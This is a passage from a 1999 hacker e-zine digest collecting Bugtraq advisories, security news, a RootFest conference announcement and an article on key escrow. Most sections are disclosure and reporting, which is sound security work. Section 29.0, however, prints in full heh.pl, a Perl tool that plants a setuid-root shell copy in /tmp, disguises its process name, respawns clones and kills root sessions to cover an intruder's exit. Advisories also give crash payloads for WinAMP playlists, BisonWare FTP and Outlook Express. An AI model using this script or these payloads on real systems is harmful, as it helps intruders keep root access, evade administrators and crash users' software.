on-site, but procedures are known well enough. S.M. asks the manufacturer's support representative if special precautions have to be taken, "errr, not that I'd think so". S.M. installs new version, all fine & dandy, even remembers to check out `sshd' afterwards and finds it to work the same as before. A couple of days later, S.M. logs in via `sshd' himself, and for the first time enters `su'. Gets very amazed at the new system's intelligence, as it knows to not ask him for a password. Minutes later, S.M. recognizes that `su' would never ask for a password, when the parent process had been created via `sshd' ... in spite of no other visible peculiarities with that process. A re-build (pretty likely boiling down to nothing but a re-link) of `sshd' fixed the problem. Quite a few years ago, when I saw the first mention of `ssh', I commented "If you're a bank, you don't buy your safe at a flea market; if you're not, you might be better off without a safe". Maybe there's _some_ truth in it, after all. Dr. Wolfgang J. "s."Moeller, Tel. +49 551 2011510, GWDG, D-37077 Goettingen, F.R.Germany P.S. re "software bloat": Imagine uSoft going open source, and no-one going to have a look at it... [from Risks Digest 20.39] @HWA 23.0 Apple's AtEase 5.0 security hole ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 13 May 1999 09:37:57 -0600 From: Tim Conrad To: BUGTRAQ@netspace.org Subject: At Ease 5.0 Security Hole Hello; At Ease 5.0 will allow a user to access any user's volume on the server. The tested configuration is as follows: MacOS 7.6.1 (should work with anything greater than 7) At Ease 5.0.2 AppleShare IP 5.0.3 Netscape 4.0.7 (No reason it shouldn't work from .99 to 4.5) How to do it. Log in as any user that has access to Netscape Communicator, and type in file://Macintosh%20HD/System%20Folder/ and you are able to access the disk. Do the same thing, except use file://At%20Ease%20Volume%20Name/At%20Ease%20%Docs/username and it's quite easy to browse through anyones files. It is possible to download files from that users directory. I have been unable to actually open any of the files once they are downloaded, however in an educational setting, just viewing names in a certian directory could constitute some serious problems (such as if a teacher works with Special Education studends, and has a list of documents to their parents). Apple apparently will not fix their own product. There is a 3rd party extention available for this at: http://www.ncal.verio.com/~lsr/programs/MSIENoServers.hqx Tim Conrad --------------------------------------------------------------------------------- Date: Fri, 14 May 1999 18:48:37 -0700 From: Vincent Janelle To: BUGTRAQ@netspace.org Subject: Re: At Ease 5.0 Security Hole This is not an apple problem mostly, its an MSIE problem. Hell, is At Ease still supported? Its just a replacement finder as far as I know, it doesn't do things like replace fs drivers and patch binaries to stop things like that. ------------ If you have any trouble sounding condescending, find a Unix user to show you how it's done. -Scott Adams --http://random.gimp.org --mailto:random@gimp.org --UIN 23939474 On Thu, 13 May 1999, Tim Conrad wrote: > Apple apparently will not fix their own product. There is a 3rd party extention > available for this at: http://www.ncal.verio.com/~lsr/programs/MSIENoServers.hqx > > > > Tim Conrad > @HWA 24.0 Bug in Microsoft Outlook Express ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Outlook Express Win98 bug Miquel van Smoorenburg (miquels@CISTRON.NL) Tue, 11 May 1999 10:58:41 +0200 There is a bug in Outlook Express delivered with Windows '98, at least version 4.72.3110.1 (4.01 SP1) and 4.72.3120.0 (4.01 SP1 + oepatsp1) Windows '95 updated with MSIE 4.01 has Outlook Express 4.72.3612.1700, which doesn't show the problem. OE from MSIE3 and MSIE5 don't have the problem either. There might be versions of MSIE4 included with Windows '98 that don't show the problem either, but I don't have a stack of Windows CDs to test against. We have talked to Microsoft NL about this, tracking number S2134 T6142. However they either deny there is a bug ("sorry sir, this product has been available for a year now so there cannot be any bugs in it") or they do not understand what we are talking about. They also claim to have not received any mail we sent to them, so I am giving up on that. We did send them this bug report by fax, perhaps that technology is stable enough to work for them, I don't know. Description of the problem: A dot on a single line means EOM in the POP3 protocol. If a message contains that it must be escaped by adding an extra dot, so we have 2 dots on a single line - which is OK. However if on the TCP level the line after this double-dot crosses over to the next packet, Outlook Express will interpret the double-dot as a single dot, switching back to POP3 command mode and interpreting the rest of the message as a response from the POP3 server. Result is an error message and usually a hanging POP3 session. Perhaps it's not really a bug in Outlook, but the Windows I/O library or the TCP implementation.. which is scary. So at the TCP packet level it looks like this: packet1: [message data] packet1: \r\n..\r\nthis is a line that packet2: continues in the next packet The double-dot on the 2nd line will be interpreted as a single dot. Include a few thousand lines like this in an email and the bug will trigger: So . this . might . actually . cause . the . bug . with . some . luck . repeat . until . three . times . max . mtu . of . 1500 Mike. -- Indifference will certainly be the downfall of mankind, but who cares? ------------------------------------------------------------------------------ Outlook Express Win98 bug, addition. Miquel van Smoorenburg (miquels@CISTRON.NL) Wed, 12 May 1999 10:59:46 +0200 In article , Miquel van Smoorenburg wrote: >There is a bug in Outlook Express delivered with Windows '98, at least >version 4.72.3110.1 (4.01 SP1) and 4.72.3120.0 (4.01 SP1 + oepatsp1) [...] >Outlook >Express will interpret the double-dot as a single dot, switching back to >POP3 command mode and interpreting the rest of the message as a response >from the POP3 server. Result is an error message and usually a hanging >POP3 session. It occured to me that it might not be clear from the original message but because the POP3 session is hanging, the message will not be removed from the server and the next time mail is check the same thing will occur. This is an effective DOS attack against the mailbox. The only way to solve this is to remove the message with another POP3 email program (Eudora, Pegasus) or to ask the sysadmin of the POP3 server to remove the message manually (look for a message that has a line starting with a dot). Upgrading to MSIE 5.0 will also solve the problem, but there is no simple/small bugfix from Microsoft available (an MSIE 5.0 download is what - 20 MB at least?) yet for as far as I know. So, ISP helpdesks - take note. This is at least one of the causes of the problems all these people have been having with their "blocked mail". Mike. -- Indifference will certainly be the downfall of mankind, but who cares? @HWA 25.0 Trivial buffer overflow DoS on WinAMP 2.x ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 12 May 1999 13:02:43 +0200 From: Wojtek Kaniewski To: BUGTRAQ@netspace.org Subject: Buffer overflow in WinAMP 2.x Introduction ------------ WinAMP is a popular Windows sound player with support for many file formats (MP3, wave files, modules). It also supports MP3 streaming (let's call it sh0utcast). Description of the problem -------------------------- If we tell WinAMP to open file location (Ctrl+L) which is over 256 bytes long, it'll produce nice GPF. The bug also appears when loading playlists (.m3u and .pls) What can we do with this bug? ----------------------------- Many sh0utcast radios place .pls files on their websites, which contain URL for radio's sh0utcast server. If we'll make b00m.pls file like this... [playlist] NumberOfEntries=1 File1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (about 256 A's) and put such link... Techno explosion -- The Coolest MP3 Radio on our website, we can make couple of WinAMPs crash. I suppose, that there's a possibility to put our own code in the filename (see cDc-351 for details). Nullsoft (producer of WinAMP) has been noticed about the bug two versions ago. -- wojtekka@irc.pl :: http://wojtekka.stone.pl/ :: ^wojtekka@ircnet ----------------------------------------------------------------------- Date: Fri, 14 May 1999 15:56:28 -0400 From: William Yodlowsky To: BUGTRAQ@netspace.org Subject: Re: Buffer overflow in WinAMP 2.x Tested on WinAMP v2.091 on Win95A and Win95B; v2.21 on Win98; v1.9? and v2.21 on WinNT 4.0WS It produced GPFs on all except WinNT, where it opened but simply didn't play. --Bill On Wed, 12 May 1999, Wojtek Kaniewski wrote: ----------------------------------------------------------------------- Date: Mon, 17 May 1999 03:40:48 +0100 From: Jello Biafra To: BUGTRAQ@netspace.org Subject: Re: Buffer overflow in WinAMP 2.x On NT Server 4 with no Service Packs installed, this causes an application error. Platform is a Cyrix MMX 233. Access Violation (0xc0000005), Address : 0x62626262 @HWA 26.0 DISA limits network activity ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ DISA Limits Network Activity contributed by erewhon On April 18, the Defense Information Systems Agency (DISA) canceled all limited peacetime privileges including internet and email usage in an effort to bolster the amount of communications bandwidth. This will prevent all unofficial Internet traffic on the European Command's Common User Data Network (CUDN). The Army's 5th Signal Command has been tasked with monitoring the network for violations of this policy. One civilian employee has reportedly already been fired for surfing for up to 13 hours on two separate occasions. This order is also designed to limit "push" technologies and large email attachments. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0517/web-lock-5-17-99.html MAY 17, 1999 . . . 17:55 EDT U.S. European Command locks down Internet Access BY DANIEL VERTON (dan_verton@fcw.com) HEIDELBERG, Germany -- To bolster the amount of communications bandwidth, the U.S. Army and Air Force have significantly curtailed the personal use of the Internet by servicemen under the European Command, including those deployed in the Balkans. The Defense Information Systems Agency's European field office began an effort to increase by 30 percent the available communications services of the Defense Information Systems Network throughout the European theater to support NATO's humanitarian and combat missions in Yugoslavia. Hoping to free up needed bandwidth, the Army and Air Force on April 18 issued the policy, which canceled all limited peacetime privileges granted to government and military employees to use government computer systems, particularly e-mail and the Internet, for personal use. The policy will remain in effect for up to one year from the date it was issued. "Our ability to support and sustain classified and unclassified e-mail capability for current operations...is affected by the available bandwidth on the" European Command's Common User Data Network (CUDN), according to the memorandum. "For that reason, it is imperative that [U.S. Army Europe] establish a minimize order immediately to all secure and non-secure network subscribers. Effective immediately, no unofficial Internet traffic may occur on the CUDN until [the] minimize [order] is lifted." The memo specifically directs the Army's 5th Signal Command to actively monitor the network for violations of the policy. It also calls on local unit commanders to brief all their personnel and to "routinely check on user activity" for evidence of inappropriate use of government computers. One civilian government employee has been dismissed based on evidence that he had visited inappropriate Web sites on two separate occasions, totaling up to 13 hours of Web surfing. The military services also have curtailed the use of "push" technologies for continuous news feeds and the attachment of large files to e-mails. The policy allows, however, some leeway for appropriate use of the Internet in support of morale, welfare and recreational activities, such as providing soldiers and airmen deployed in Albania, Macedonia and elsewhere with links to family members in the United States. In addition to slowing down the network, "personal use of Internet services provides a conduit through which information assurance and security can be compromised," according to a spokesman for the Army's European Command. "Our information dominance depends on it, and we are running out of pipes." @HWA 27.0 Money in the bank is an intangible? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ HACKER'S PARADISE by BHZ, Monday 17th May 1999 on 10:08 pm CET Looks like after Norway hackers could find their paradise in New Zaeland. Law Commission has acknowledged that it is not against the law for a hacker to break into a New Zealand bank's computer system and transfer funds into his or her own bank account. "There cannot be theft under section 220, Crimes Act 1961, of an intangible thing. In (a recent Court of Appeal case) the court held that the definition in section 217 is confined to tangible things and does not extend to ... a credit in a bank account." Read the article on InfoWar. http://www.infowar.com/hacker/99/hack_051799b_j.shtml Hacker Sitings and News 5/17/99 New Zealand: Urgent Action Wanted To Protect Banks From Hacking. THE Law Commission has acknowledged that it is not against the law for a hacker to break into a New Zealand bank's computer system and transfer funds into his or her own bank account. In a report on computer crime, the commission says that under section 220 of the Crimes Act 1961 it is not against the law to steal something intangible. "There cannot be theft under section 220, Crimes Act 1961, of an intangible thing. In (a recent Court of Appeal case) the court held that the definition in section 217 is confined to tangible things and does not extend to ... a credit in a bank account." The Network of Internet Related Organisations is pushing for urgent changes to legislation to protect banks and other organisations from the effects of hackers. Spokesman Chris Patterson, a solicitor with Hesketh Henry, said it was an understatement to say electronic security in New Zealand was a huge problem. Mr Patterson said Niro believed an amendment to the Crimes Act should be passed by the Government immediately to stop cyber-criminals. The Law Commission has recommended that there be four new offences dealing specifically with computer misuse. They are: unauthorised interception of data stored in a computer; unauthorised accessing of data stored in a computer; unauthorised use of data stored in a computer; and unauthorised damaging of data stored in a computer. Justice Minister Tony Ryall said he planned to introduce a draft bill including the first three offences by the end of next month. But he said the offence of hacking raised more complex issues and would need further consultation before legislation on that was drafted. THE DOMINION 14/05/1999 @HWA 28.0 r00tfest is coming soon, with some heavyweights planning to attend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + Who; The computer underground, security professionals, IT managers, feds, system administrators, and anyone else who would like to learn more about security. + What; A computer security conferece that will have speakers, vendors, door prizes, contests, events and more. + When; May 21-23, 1999 + Where; Smack in the middle of North America, in Minneapolis Minnesota at the Minneapolis Convention Center, room 103. + Why; To expand you computer security knowledge, visit the famous Mall of America, meet many of the people face to face that you've been talking with over the internet, meet new friends and contacts, and get away from your job for a couple days. + Cost; - $40 at the door. More info at www.rootfest.org RootFest '99 Speakers Bruce Schneier - Topic To Be Announced. Mr. Schneier is the president of Counterpane Systems, and the inventor of the Blowfish algorithm. He is the author of Applied Cryptography, The Electronic Privacy Papers, and E-Mail Security. Mr. Schneier has given talks at DefCon, and the Black Hat Briefings. Steve Stakton (Optiklenz) - Cisco PIX Firewall Security Analysis Optiklenz is the founding member of the Legions of the Underground, and their newly formed Legions Interactive. He is a frequent editor and contributor to the LoU ezine, Keen Veracity. Adam L. Beberg - Software Development for a Hostile Internet Adam L. Beberg is the founder and president of Distributed.net, founded in 1997 as a gathering point for research and projects related to distributed computing. Adam is currently working on Cosm, a protocol for large scale distributed computing. Mike Roadancer - "Hacker - It's not a Dirty Word" Hackers in the workplace. Mike Roadancer is the president of the Hacker's Defense Foundation. Brian Ristuccia - Circumventing Censorware, Filtering Proxies, and Government Firewalls. Mr. Ristuccia is the author of the Internet Alternate Namespace proxy server software and operator of the Anti-Censorware Proxy. He is a University of Massachusetts Computer Science Undergraduate and an employee of Nortel Networks. Peter Shipley - The results of a 3 year effort multi-modem wardialing on a massive scale. Security problems occur when obvious security problems are overlooked. One commonly overlooked problem is alternative access methods to a corporate Intranet from an external machine. Many if not most companies are overlooking their secondary vulnerabilities surrounding alternate methods of network access. The results of the completed survey will be analyzed summarized along with lessons and techniques learned. Mr. Shipley is an consultant in the San Francisco's Bay Area with over thirteens years experience n the Computer Security field. Currently working for KPMG LLP. out of the San Jose/Silicon Valley office with the title of "Chief Security Architect". Mr. Shipley is one of the few individuals who is well known and respected in the professional world as well as the underground/hacker community. He has extensive experience in system and network security as well as programming and project design. Mr. Shipley's past accomplishments include first in depth research into the security aspects of wardialing, designing and implanting the first automated network security scanner, among other accomplishments. Mr. Shipley's specialties are third party penetration testing and firewall review, computer risk assessment, and security training. Mr. Shipley also performs post-intrusion analysis as well as expert witness testimony. Paul McNabb - Trusted Operating Systems Technology in Web-based Computing Mr. McNabb is the CTO and vice president of Argus Systems Group, Inc. and has over ten years of in-depth experience in the design, development, documentation and testing of secure operating systems and networks. He has also performed security consulting and seminars for various military, government, university and industry groups in numerous countries. Brenno J.S.A.A.F. de Winter - Internet Security in Europe: State of Affairs. Brenno de Winter is the president of De Winter Information Solutions, based in the Netherlands. He has years of experience in development, risk assessment and security. He is a involved in the development and consultacy of web-based fuctions and security, and is currently the project leader in end-to-end testing of digital television equipment for Philips (focused on conditional access) DataShark - All about TEMPEST monitoring DataShark is a U.S. hacker from the famed Legions of the Underground hacking group. He plans on having a working TEMPEST/van Eck monitoring station in time for RootFest. Richard Thieme - Cancelation: Date conflict. Look for Mr. Thieme at RootFest 2K. Bill Campbell - Biometrics: Opportunity and Challange Bill Campbell is Principal Consultant with Eagle's Reach, an independant information security and technology risk management firm headquartered in the Boston area. He was previously Director of Information Security Engineering with Fidelity Investments, and has over 15 years experience in technical security, software development, operations support, and quality assurance in both the private and public sectors. (Eagle's Reach does not develop, market or sell biometric products.) GloiDemon - Vector-based Super Hashing, Middle East State of Affairs GloiDemon is a hacker from Kuwait Winn Schwartau - Time-based Security (via video conference) Winn Schwartau is the leading authority on Information Warfare. His sites, Infowar.com and Info-Sec.com are some of the most popular security sites on the 'net. He has published many books, including Information Warfare: Chaos on the Electronic Superhighway, and his new book, Time Based Security, the opening chapters of which can be found here. He has given talks at Black Hat, and DefCon. John Kozubik - Intrusion Detection Systems John Kozubik has over four years experience in the network security field, and is currently working on VPN's, wireline encryption, and operational Intrusion Detection. He writes a monthly NT security column, available at NetworkCommand, and has written several white papers on Intrusion Detection, Decoy Networks, and Disaster Recovery. From http://www.403-security.net/ RootFest elite security conference Astral 13.05.1999 18:45 RootFest is a computer security convention and conference being held in Minneapolis, Minnesota, USA. As far as I know, it's the first of its kind in the whole Midwest. We welcome all computer security professionals, the computer underground, hackers, IT professionals, government agents, feds, MIB, and anyone who would like to come learn about computer security.Chech their webiste RootFest. http://www.rootfest.org From http://www.net-security.org/ ROOTFEST IS CLOSE by BHZ, Friday 14th May 1999 on 1:01 pm CET Rootfest is coming. It is a security conference held in Minneapolis (USA), which will be very "elite" this year. Many security professionals are coming to give a speech. The dutch Brenno de Winter, owner of De Winter Information Solutions, will speak on the State of Affairs in Europe. He did some research and the results are disturbing. Read his article called Robustness of data security is poor. Just to inform our readers that HNS will have a detailed special report on Rootfest. PRESS ANNOUNCEMENT Robustness of data security is poor General From May 21st till May 23rd a computer security conference, called Rootfest will be held in Minneapolis (USA). At this conference security specialists, the "hacking" society, IT professionals, United States government agents and FBI will come together to discuss computer security. The dutch Brenno de Winter, owner of De Winter Information Solutions, will speak on the State of Affairs in Europe. For this conference he did some basic research. The results are disturbing. About Rootfest Almost anywhere in the world people are becomming aware of the fact that computer crimes are a potential and present danger to our society. Last year Bill Clinton spoke about terrorism moving more towards the computer. With the danger in mind a conference has been organised. At this conference hackers, FBI, police officials, governments, computer specialist and IT security professionals join forces and will focus together on the same problem. Currently somewhere between 600 and 900 attendees are expected to come. State of Affairs in the Netherlands Every day more and more is written about e-commerce (electronic sales through the internet). In the Netherlands the internet is pushed by the government in the SWAP 2000 project. SWAP 2000 is an effort to reduce the gap between the Netherlands and the USA in technology. Computer crimes are a real threat to the growth of technology. The test The main target was to use a medium that is widely spread and where basic security is simple and cheap. So e-mail was choosen. An artifact of e-mail is that quite often virusses get spread through e-mail (in this context one can think of the very recent Melissa-virus). Since the target was getting an general impression on secure e-mail 39 dutch organisations have been mailed. These organisation were insurance companies, banks, 12 major ICT companies, 8 government organisations, 4 political parties. Important was that the organisation needs to be have reasons to receive confidential documents or the organisation delivers internet-related systems (ICT companies -> they need to indicate the secure way). The e-mail first briefly indicated that sending data per e-mail could mean a risk and then asked what method could be used to send an secure e-mail (encryption). Remark: e-mails are basically letters that are sent out without an envelope. By using encryption this envelope is provided for the e-mail. E-mails can be easily intercepted and thus read. This can lead to confidential data becomming public. Also without encryption it is very easy to send mail using somebody elses indentity. By using encryption signatures can be checked. Results When an response came to the request, the answer was noted. When was stated that e-mail was used for informal communiction only that was accepted as a proper solution (because sensitive data was sent by other means). When no response was given, there is a major change that people start sending the sensitive data without any security measures. So this was regarded as no solution available. No bank or insurcance company has a policy on secure e-mail. One insurance company mailed that they couldn't (of course) inform me on this issue out of security considerations. Only two out of twelve ICT companies had a way of using secure e-mail. Most government organisations only used e-mail as an informal way of communication and thus reduced the risk. One unforutnate thing is the police west-veluwe vallei in the Netherlands that allows people to press charges by e-mail. They use e-mail formally and use not secured forms and thereafter not secured e-mail (although they wrote they were considering there options). Other facts Also attention has been paid to the security on laptops. Laptops contain programs and data. This data ought to be encrypted. So if a laptop is stolen no data becomes available. Last year a police team LRT (national detective team) had a laptop that was stolen out of a police building. All data (snitches, cases under investigation) became known. This data was handed to the press. Encryption to prevent this is easy and cheap to get. However less dan 7% of the companies checked were protecting their data. Finally The several small investigation show, according to Brenno de Winter, that the awareness on data security is way below acceptable point. This may easily lead to major incidents in the future, setting back usage for internet and other ICT solutions. However basic security is often freely available. About Brenno de Winter Brenno de Winter, 27, is CEO of De Winter Information Solutions. De Winter Information Solutions is a company that focusses on software development, consultacy and Internet solutions and security. Brenno has been programming since he was twelve years old and working on the internet since 1992. In the so-called Open Source community he is active in several freeware projects, among the freeware encryption GnuPG. Further information If you would like further information you can contact: Brenno de Winter. E-mail: brenno@dewinter.com phone: +31 6-53 53 6508 fax: +31 318-652913. On the internet http://www.dewinter.com For secure e-mail you can find the PGP-public key on http://www.dewinter.com/secure.html For further information on Rootfest you can go to http://www.rootfest.org Some examples on how easy it is to attack security can be shown upon request. @HWA 29.0 heh.pl creates a number of rootshells in /tmp and disguises itself.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml Heh.pl - Heh.pl is a program that creates a user specified number of rootshells in /tmp, disguises itself, monitors the clone rootshells, and logs out all root terminals and disables console when desired, giving you time to clean logs and make a quick exit. Simple, but neat. 3k. By feach, We're All Gonna Die cult. #!/usr/bin/perl # Heh.pl # By: feach # # this program creates rootshells # in /tmp you pick the amount of shells, it # disguises itself, watches for the other clones, and # kills root if any clones die. # # Shouts Out: me, sirgrim, www.WAGD.com, #hacking on webchat # # &set_vars; while ($famsize > 1) { &forker; $famsize--; } &initialize; &controlfreak; die "this shit wont werk were ur dumbass is at"; # THIS IS THE ONLY SECTION YOU NEED TO CHANGE sub set_vars { $famsize = 20; #how many additional clones do you want $rootid = 0; $shelltime = 15; # Tells you to leave the clones out for 15 seconds $sleeptime = 45; #To sleep 45 seconds between clones $paranoid = 0; # set this if you want to kill *all* shells, not just root # look at that below get creative make this prog kick some ass #@psnames = ('vi','nfsiod','kflushd','kswapd','update','lpd','/usr/sbin/rpc.mountd','/usr/sbin/rpc.nfsd','0wned'); @psnames = ('dickhead','shitface','fuck','diebitch','x0x','phucewe','mountme','shitd','0wned'); } sub initialize { &set_vars; &disguise; &scent; sleep 2; &fraternize; } sub disguise { srand(time ^ $$); $randum = int(rand(9)); $0 = $psnames[$randum]; } sub controlfreak { $end = 0; $slept = 0; $shell = 0; while ($end < 1) { &check_bro; sleep 1; ++$slept; if ($shell == 0 && $slept > $sleeptime) { &make_shell; $slept = 0; $shell = 1; } if ($shell == 1 && $slept > $shelltime) { &kill_shell; $slept = 0; $shell = 0; } } } sub panic { &kill_roots; &set_vars; while ($famsize > 1) { &forker; $famsize--; } &initialize; &kill_roots; } sub scent { open PSLOG, '>>/tmp/31336.tmp'; print PSLOG "$$-"; close PSLOG; } sub fraternize { open (PSLIST, '/tmp/31336.tmp') || die "no ps list!!!\n"; @brolist = split("-",); close PSLIST; sleep (4); if (-e '/tmp/31336.tmp') { unlink '/tmp/31336.tmp';} } sub check_bro { $ok = 0; foreach $ps (@brolist) { unless (kill 0,$ps) { &panic;} } } sub make_shell { unless (-e '/tmp/.nfsd') { system ('cp /bin/sh /tmp/.nfsd'); system ('chmod 4755 /tmp/.nfsd'); } #system ('touch -t 031320251996 /tmp/.nfsd); } sub kill_shell { if (-e '/tmp/.nfsd') { unlink '/tmp/.nfsd'; #a better shell killer... } } sub kill_roots { open( PSK, "ps -jax |"); while ($xx = ) { chop ($xx); @info = split(" ", $xx, 10); if ($info[7] == $rootid && $info[9] =~ 'sh') { unless ($info[9] =~ 'flush') {kill 9,$info[1];} } } close(PSK); } sub forker { $spawn_id = fork(); die "fork failed: $!" unless defined $spawn_id; if ($spawn_id) { waitpid($spawn_id,0); } else { $dfork = fork(); die "double fork failed $!" unless defined $dfork; if ($dfork) { exit 0; } $famsize = 0; } } @HWA 30.0 RedHat 6.0 fixes available for some current vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sun, 16 May 1999 13:01:46 +0200 From: Hugo van der Kooij To: BUGTRAQ@netspace.org Subject: Red Hat Linux 6.0 fixes Hi, As Red Hat did not send messages around I will fill in this gap for now. (Hello Red Hat. Don't get sloppy on this.) There are a few fixes available for Red Hat Linux 6.0 which can be found on ftp://updates.redhat.com/6.0/ and these include: - Newer floppy images for i386. - newer pump package to fix DHCP anomalies. - newer xscreensaver package to fix security issues. - newer apmd package (i386 only) See also: http://www.redhat.com/corp/support/errata/rh60-errata-general.html Hugo. PS: There is no info about these images on the website. But it just adds support for the ICP Vortex controler according to the README file PS/2: There are some typo's on the errata pages. It would be nice if these were fixed as well. -- Hugo van der Kooij; Oranje Nassaustraat 16; 3155 VJ Maasland hvdkooij@caiw.nl http://www.caiw.nl/~hvdkooij/ -------------------------------------------------------------- Use of any of my email addresses for unsollicited (commercial) email is a clear intrusion of my privacy and illegal! @HWA 31.0 BisonWare FTP server vulnerabilities can lead to root compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 17 May 1999 12:52:02 -0400 From: Russ To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Vulnerabilities in BisonWare FTP Server 3.5 Arne Vidstrom submitted the following observations regarding BisonWare FTP Server 3.5. I contacted the authors of BisonWare and gave them a copy of Arne's message. After each of Arne's observations I include the response from BisonWare's Nick Barnes sent back to me. If you respond to this message, please ensure you're responding to Arne, Nick, and/or the NTBugtraq list (as opposed to responding to me). Cheers, Russ - NTBugtraq Editor AV=Arne Vidstrom (winnt@BAHNHOF.SE - May 8th, 1999) NB=Nick Barnes (nick_barnes@compuserve.com - May 16th, 1999) AV >Hi everybody, > >I've found a few vulnerabilities in BisonWare FTP Server 3.5 (latest >version). Perhaps they are already know, but here they are: > >1) The server doesn't close the old socket from the last PASV command >when given a new PASV command. Thus, it runs out of buffer space if you >give lots of PASV commands in a row. Finally, you can't use the server, >and it consumes lot's of memory that isn't released when the client >disconnects. NB >1. Fixed in release 4.1 due out in the next 10 days. AV >2) If you log in and give the command "PORT a", and then press Enter >a few thousand times in a row, the server will crash because it can't >handle a non-numeric character after PORT and somehow adds all the >CRLF's to the PORT command in a buffer that seems to overflow. NB >2. Fixed in release 4.1 AV >3) There are buffer overflows for commands that take arguments, for >example LIST xxxx (1500 characters) and CWD xxx (1500 characters) will >crash it. This works for the USER command too, so an attacker won't >need a valid account to crash the server. NB >3. Fixed in release 4.1 AV >4) The account passwords are stored in plaintext in the registry, at >HKEY_CURRENT_USER\Software\BisonWare\BisonFTP3\Users and are also >shown when you manage users in the server. They are also added to the >logs when users log in, depending on how you configure logging. So >don't put your logs in a directory that can be viewed by FTP users. ;) NB >4. Fixed in release 4.1. Passwords will still be stored plain within >the registry. The registry should only ever be available to the >administrator, and some large corporate clients use there own software >to build user lists. AV >5) Another point is that after default installation, an anonymous user >can access everything in your computer because you have to set the >limitations after installation. You can't really count that as a bug I >guess, but it's really dangerous anyway... so if you run this server, >make sure you reconfigure it if you haven't already!!! NB >5. This isn't really a bug from our point of view. The whole point is >to allow FTP operation immediately after install. This is a selling >advantage over competitive products which require lots of set up before >you can use them with a client such as your browser. @HWA 32.0 Key Escrow revisited (who are the real criminals here??) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Key Escrow Not Just to Bust Criminals Anymore contributed by Weld Pond A working document for the Scientific and Technological Options Assessment panel, recently released by the European Parliament, claims the United States has tried to persuade European Union countries to adopt its key escrow or key recovery policies. These policies would allow backdoor access to encryption programs. The US has claimed that this was necessary to read messages exchanged by criminals. The report clams however that the UKUSA alliance, which includes the United Kingdom, United States, Canada, Australia, and New Zealand, has used its secret Echelon global spying network to intercept confidential company communications and give them to favored competitors. The report also claims that the NSA had struck deals with Microsoft, Lotus, and Netscape to alter their products for foreign use, presumably to make it easier for the NSA to intercept communications. C|Net http://www.techweb.com/wire/story/TWB19990518S0004 Technology News Report: U.S. Uses Key Escrow To Steal Secrets (05/18/99, 9:27 a.m. ET) By Madeleine Acey, TechWeb European plans for controlling encryption software are nothing to do with law enforcement and everything to do with U.S. industrial espionage, according to a report released by the European Parliament on Friday. The working document for the Scientific and Technological Options Assessment panel said the United States has tried to persuade European Union countries to adopt its key escrow or key recovery policies -- allowing backdoor access to encryption programs -- saying this was necessary to read messages exchanged by criminals. But the report details how the UKUSA alliance -- made up of the United Kingdom, United States, Canada, Australia, and New Zealand -- has used its secret Echelon global spying network to intercept confidential company communications and give them to favored competitors. Thomson S.A., located in Paris, and Airbus Industrie, based in Blagnac Cedex, France, are said to have lost contracts as a result of information passed to rivals. "The U.S. government misled states in the EU and [Organization for Economic Cooperation and Development] about the true intention of its policy," the report adds. "Between 1993 and 1997 police representatives were not involved in the NSA [National Security Agency]-led policy-making process for key recovery. Despite this, during the same period the U.S. government repeatedly presented its policy as being motivated by the stated needs of law-enforcement agencies." The document went on to detail how the agencies specifically studied Internet data. Apart from scanning all international communications lines -- using 120 satellites, microwave listening stations, and an adapted submarine -- it said they stored and analyzed Usenet discussions. "In the U.K., the Defence Evaluation and Research Agency maintains a 1-terabyte database containing the previous 90 days of Usenet messages." The "NSA employs computer 'bots' (robots) to collect data of interest," the report adds. "For example, a New York website known as JYA.COM offers extensive information on cryptography and government communications interception activities. Records of access to the site show that every morning it is visited by a bot from NSA's National Computer Security Center, which looks for new files and makes copies of any that it finds." According to a former employee, NSA had by 1995 installed "sniffer" software to collect traffic at nine major Internet exchange points. The report offered evidence that a leading U.S. Internet and telecommunications company had contracted with the NSA to develop software to capture Internet data of interest, and that deals had been struck with Microsoft, Lotus, and Netscape to alter their products for foreign use. "There can't be any doubt any longer that there's an economic imperative to these policies," said Simon Davies, director of Privacy International. "We have been lied to for years. But it will be up to companies like Airbus to take legal action to force a definition of national security in the context of the European Union. Then we can establish a legal framework and appeals process." Meanwhile, the Financial Times reported on Monday that the U.K. government had agreed to take key escrow "off the agenda" and had accepted industry proposals for a "largely voluntary program of co-operation with the security services". Government officials could not confirm the report. But Caspar Bowden, director of the Foundation for Information Policy Research, questioned how far any compromise would go. "Will they persist with statutory licensing [of trusted third parties]and criminal legislation on decryption warrants?" he asked. Andrew Dornan of Data Communications International contributed to this report. @HWA 33.0 AOL Under Siege by Hackers, NOT! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by wariac Print and online media are bad enough but television 'news' has got to be the worse information source on the planet. The local CBS affiliate in Tucson Arizona, KOLD, ran a lead story on its 10pm "news-cast" last week that claimed that 'hackers' had invaded AOL and where threatening to distribute the personal information of its users. Unless of course that user forwarded an email to 10 other users within 45 minutes. KOLD aired this "news" without confirmation, without contacting an independent third party, without even getting an official response from AOL. All they had was the copy of an email from someone who wasn't even a user of AOL! This email was evidently enough to run a several minute segment as the lead story and scare the hell out of several thousand viewers in the Tucson area. And people wonder why Joe Schmoe is afraid of the Internet. Star Net Dispatches 